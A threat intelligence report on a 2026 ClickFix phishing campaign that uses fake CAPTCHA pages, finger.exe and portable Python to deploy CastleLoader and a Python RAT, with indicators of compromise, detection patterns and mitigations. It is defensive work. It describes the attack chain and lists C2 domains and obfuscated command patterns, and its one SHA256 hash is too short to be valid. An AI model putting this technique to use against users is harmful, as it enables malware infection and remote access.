Full Report
The LevelBlue OpsIntel CTI team examined the latest version of the ClickFix campaign, which emerged in early May 2026. The campaign employs a multi-stage phishing delivery chain that impersonates trusted employment and professional networking platforms, such as LinkedIn and Indeed, to lure victims. This variant leverages the legacy Finger protocol through native Windows command-line utilities as part of its delivery process. The threat actors use legitimate Windows tools and portable Python runtimes to execute in-memory shellcode, ultimately deploying a fileless Malware-as-a-Service (MaaS) framework tracked as CastleLoader and a Python-based remote access trojan (RAT). The campaign reflects the continued rise of browser-based social engineering with Living-off-the-Land binaries (LOLBin) and Python-based payload delivery.
Analysis Summary
# Tool/Technique: ClickFix (2026 Finger Protocol Variant)
## Overview
The ClickFix campaign is a sophisticated social engineering and delivery framework that uses browser-based lures to trick users into executing malicious commands. This specific 2026 variant impersonates professional platforms like LinkedIn and Indeed, utilizing a "fake CAPTCHA" lure to facilitate a multi-stage infection chain that ultimately deploys the CastleLoader framework and a Python-based Remote Access Trojan (RAT).
## Technical Details
- **Type**: Malware-as-a-Service (MaaS) / Delivery Technique
- **Platform**: Windows
- **Capabilities**: Browser social engineering, LOLBin abuse, fileless execution, in-memory shellcode loading, and persistent remote access.
- **First Seen**: May 2026
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1566.002 - Phishing: Spearphishing Link]
- **[TA0002 - Execution]**
- [T1059.003 - Command and Scripting Interpreter: Windows Command Shell]
- [T1204.002 - User Execution: Malicious Link]
- **[TA0005 - Defense Evasion]**
- [T1218 - System Binary Proxy Execution]
- [T1027.002 - Obfuscation: Software Packing]
- [T1140 - Deinterlace/Decode Files or Information]
- [T1564.003 - Hide Artifacts: Hidden Window]
- **[TA0011 - Command and Control]**
- [T1105 - Ingress Tool Transfer]
- [T1011.001 - Exfiltration Over Alternative Protocol: Finger]
## Functionality
### Core Capabilities
- **Social Engineering**: Uses fake Cloudflare Turnstile/CAPTCHA pages to trick users into copying a malicious command to their clipboard and pasting it into a terminal.
- **LOLBin Abuse**: Leverages `finger.exe` (a legacy protocol utility) to fetch remote command streams and `curl.exe` (renamed to avoid detection) for payload retrieval.
- **System Disruption**: Kills and restarts `explorer.exe` to hide the taskbar and desktop icons, disorienting the user and limiting navigation during the infection.
- **Python-In-Memory**: Deploys portable Python runtimes (CPython or IronPython) to execute complex scripts and shellcode without requiring a pre-installed Python environment.
### Advanced Features
- **Finger Protocol Steganography**: Uses the legacy Finger protocol via `finger.exe` to bypass network filters that typically ignore or don't inspect this outdated traffic.
- **Fileless Execution**: Stages the **CastleLoader** framework, which operates primarily in memory to avoid disk-based forensic detection.
- **ROT13 Encoding**: Uses simple encoding for first-stage JavaScript payloads to evade basic signature-based web gateways.
## Indicators of Compromise
- **File Hashes (SHA256)**:
- `aea8348e8902cac80eb0df31b43a71601a62e2514087fef40a416bfd` (Python RAT bytecode - play.pyc)
- **File Names**:
- `%LocalAppData%\d{18}.com` (Renamed curl.exe)
- `%LocalAppData%\d{18}.exe` (Renamed curl.exe)
- **Network Indicators**:
- `uslinked[.]org` (C2/Payload Delivery)
- `kevinnotanother[.]com` (C2 Domain)
- `staruxaproruha[.]com` (C2 Domain)
- `novayastaruxa[.]com` (C2 Domain)
- `crewlcrewlcrewl[.]com` (C2 Domain)
- `crewlworkinew[.]com` (C2 Domain)
- **Behavioral Indicators**:
- Unexpected termination and restart of `explorer.exe`.
- Outbound traffic from `finger.exe` to external domains.
- Execution of `cmd.exe` or `powershell.exe` containing `Set-Clipboard` or `f^i^n^g^e^r` (obfuscated).
## Associated Threat Actors
- Tracked as part of the broader **ClickFix** ecosystem (MaaS).
## Detection Methods
- **Behavioral Detection**: Monitor for `finger.exe` initiating network connections, as this protocol is rarely used in modern corporate environments.
- **Process Monitoring**: Alert on `cmd.exe` processes spawned with minimized windows (`/min`) and caret-based obfuscation.
- **Endpoint Detection**: Watch for the creation of portable Python runtime directories in `%LocalAppData%` by non-standard processes.
## Mitigation Strategies
- **Network Hardening**: Block the Finger protocol (Port 79) at the network perimeter.
- **User Training**: Educate staff on "Copy-Paste" phishing lures; emphasize that legitimate CAPTCHAs do not require manual command execution.
- **Attack Surface Reduction**: Use AppLocker or Windows Defender Application Control (WDAC) to restrict the execution of LOLBins like `finger.exe` to authorized users only.
## Related Tools/Techniques
- **CastleLoader**: The fileless loader framework deployed in the final stage.
- **EtherHiding**: A related technique used in previous ClickFix campaigns to hide malicious code in blockchain logs.